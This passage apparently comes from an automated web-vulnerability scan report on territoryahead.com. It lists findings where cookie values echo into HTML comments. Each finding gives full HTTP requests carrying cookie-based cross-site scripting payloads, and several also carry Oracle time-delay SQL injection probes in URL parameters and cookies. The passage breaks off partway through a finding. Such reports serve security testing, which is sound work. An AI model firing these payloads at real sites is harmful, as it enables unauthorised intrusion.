Cookie: mmlID=6840816836d2e--><script>alert(1)</script>1deb5b8a81e; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5
...[SNIP]...

5.139. https://www.territoryahead.com/account/login/loginmain%20.jsp [order cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the order cookie is copied into an HTML comment. The payload 52f6b--><script>alert(1)</script>94ebbb28b25 was submitted in the order cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=6350391452f6b--><script>alert(1)</script>94ebbb28b25; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:25:57 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ncoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=6350391452f6b--><script>alert(1)</script>94ebbb28b25; customer=92643931; PS_ALL=%23ps_catid%7Eaccount; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301081933&v=3&e=1301083737353

...[SNIP]...

5.140. https://www.territoryahead.com/jump.jsp [90232094_clogin cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the 90232094_clogin cookie is copied into an HTML comment. The payload 8af22--><script>alert(1)</script>26113198838 was submitted in the 90232094_clogin cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=13010823252448af22--><script>alert(1)</script>26113198838

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:29:35 GMT
Server: Apache
ETag: "AAAAS7uc384"
Last-Modified: Fri, 25 Mar 2011 19:17:50 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 39295


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
8108%29%257c%257cchr%28101%29%257c%257cchr%28109%29%257c%257cchr%28109%29%257c%257cchr%2897%29%29%252c25%29+from+dual%29; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=13010823252448af22--><script>alert(1)</script>26113198838; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: nTUv8KwSrSgAAH2NuQkAAAAl
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https://www.territoryahead.com/jump.jsp
HTTPS: on

Cookies:
mmlID = 68408168

...[SNIP]...

5.141. https://www.territoryahead.com/jump.jsp [CoreID6 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload 70ca4--><script>alert(1)</script>974b3a0bf3c was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209470ca4--><script>alert(1)</script>974b3a0bf3c; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:25:47 GMT
Server: Apache
ETag: "AAAAS7ucAYc"
Last-Modified: Fri, 25 Mar 2011 19:14:02 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209470ca4--><script>alert(1)</script>974b3a0bf3c; order=63503913; customer=92643931; JSESSIONID=auMBUcQMcNOb; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; 90232094_clogin=l=1301080516&v=3&e=1301082340667; PS_ALL=%23ps_ca
...[SNIP]...

5.142. https://www.territoryahead.com/jump.jsp [JSESSIONID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the JSESSIONID cookie is copied into an HTML comment. The payload c0c2f--><script>alert(1)</script>048dd4a1770 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-ec0c2f--><script>alert(1)</script>048dd4a1770

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:26:23 GMT
Server: Apache
ETag: "AAAAS7ucJRV"
Last-Modified: Fri, 25 Mar 2011 19:14:38 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=63503913; Path=/; Expires=Fri, 08-Apr-2011 19:14:38 GMT
Set-Cookie: customer=92643931; Path=/; Expires=Sat, 23-Mar-2019 19:14:38 GMT
Set-Cookie: JSESSIONID=aeBRiVzxLAc_; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38472


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ge: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503913; customer=92643931; JSESSIONID=a-e7l_ipIG-ec0c2f--><script>alert(1)</script>048dd4a1770; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; 90232094_clogin=l=1301080516&v=3&e=1301082340667; PS_ALL=%23ps_catid%7E%28select+dbms_pipe.receive_message%28%28chr%2895%29%2
...[SNIP]...

5.143. https://www.territoryahead.com/jump.jsp [PS_ALL cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the PS_ALL cookie is copied into an HTML comment. The payload 96a8c--><script>alert(1)</script>5d6a7c7b9bc was submitted in the PS_ALL cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d1096a8c--><script>alert(1)</script>5d6a7c7b9bc; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082325244

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:20:21 GMT
Server: Apache
ETag: "AAAAS7ucy4D"
Last-Modified: Fri, 25 Mar 2011 19:17:29 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38741


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
tf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503913; customer=92643931; JSESSIONID=auMBUcQMcNOb; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d1096a8c--><script>alert(1)</script>5d6a7c7b9bc; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082340667; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: fC0vAqwSrRQAAGydCu0AAAAR
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https
...[SNIP]...

5.144. https://www.territoryahead.com/jump.jsp [cmTPSet cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the cmTPSet cookie is copied into an HTML comment. The payload c8e35--><script>alert(1)</script>691c4488899 was submitted in the cmTPSet cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Yc8e35--><script>alert(1)</script>691c4488899; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082325244

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:20:06 GMT
Server: Apache
ETag: "AAAAS7ucvNU"
Last-Modified: Fri, 25 Mar 2011 19:17:14 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 39295


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
n;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503913; customer=92643931; JSESSIONID=auMBUcQMcNOb; cmTPSet=Yc8e35--><script>alert(1)</script>691c4488899; PS_ALL=%23ps_catid%7E%28select+dbms_pipe.receive_message%28%28chr%2895%29%257c%257cchr%2833%29%257c%257cchr%2864%29%257c%257cchr%2851%29%257c%257cchr%28100%29%257c%257cchr%28105%29%257c%257cchr%28108
...[SNIP]...

5.145. https://www.territoryahead.com/jump.jsp [customer cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the customer cookie is copied into an HTML comment. The payload 451ec--><script>alert(1)</script>e1e6716de1c was submitted in the customer cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931451ec--><script>alert(1)</script>e1e6716de1c; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:17:17 GMT
Server: Apache
ETag: "AAAAS7ucGB4"
Last-Modified: Fri, 25 Mar 2011 19:14:25 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
te,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503913; customer=92643931451ec--><script>alert(1)</script>e1e6716de1c; JSESSIONID=auMBUcQMcNOb; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; 90232094_clogin=l=1301080516&v=3&e=1301082340667; PS_ALL=%23ps_catid%7E%28select+dbms_pipe.receive_m
...[SNIP]...

5.146. https://www.territoryahead.com/jump.jsp [mmlID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the mmlID cookie is copied into an HTML comment. The payload c290d--><script>alert(1)</script>9551fb33735 was submitted in the mmlID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168c290d--><script>alert(1)</script>9551fb33735; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:16:36 GMT
Server: Apache
ETag: "AAAAS7ub8EQ"
Last-Modified: Fri, 25 Mar 2011 19:13:44 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 37868


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168c290d--><script>alert(1)</script>9551fb33735; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; 90232094_clo
...[SNIP]...

5.147. https://www.territoryahead.com/jump.jsp [order cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the order cookie is copied into an HTML comment. The payload 2d0a4--><script>alert(1)</script>bcb7d662e45 was submitted in the order cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=635039142d0a4--><script>alert(1)</script>bcb7d662e45; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:17:02 GMT
Server: Apache
ETag: "AAAAS7ucCQU"
Last-Modified: Fri, 25 Mar 2011 19:14:10 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ncoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=635039142d0a4--><script>alert(1)</script>bcb7d662e45; customer=92643931; JSESSIONID=auMBUcQMcNOb; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; 90232094_clogin=l=1301080516&v=3&e=1301082340667; PS_ALL=%23ps_catid%7E%28select+
...[SNIP]...

5.148. https://www.territoryahead.com/jump.jsp [s_cc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the s_cc cookie is copied into an HTML comment. The payload 15573--><script>alert(1)</script>baa59d3f676 was submitted in the s_cc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true15573--><script>alert(1)</script>baa59d3f676; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082325244

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:29:22 GMT
Server: Apache
ETag: "AAAAS7uc0rL"
Last-Modified: Fri, 25 Mar 2011 19:17:36 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 39295


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
chr%2851%29%257c%257cchr%28100%29%257c%257cchr%28105%29%257c%257cchr%28108%29%257c%257cchr%28101%29%257c%257cchr%28109%29%257c%257cchr%28109%29%257c%257cchr%2897%29%29%252c25%29+from+dual%29; s_cc=true15573--><script>alert(1)</script>baa59d3f676; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082340667; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: nGhmwawSrSgAAET9iDcAAAA6
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https://www.terr
...[SNIP]...

5.149. https://www.territoryahead.com/jump.jsp [s_sq cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the s_sq cookie is copied into an HTML comment. The payload a3d4d--><script>alert(1)</script>26f91f30e7b was submitted in the s_sq cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

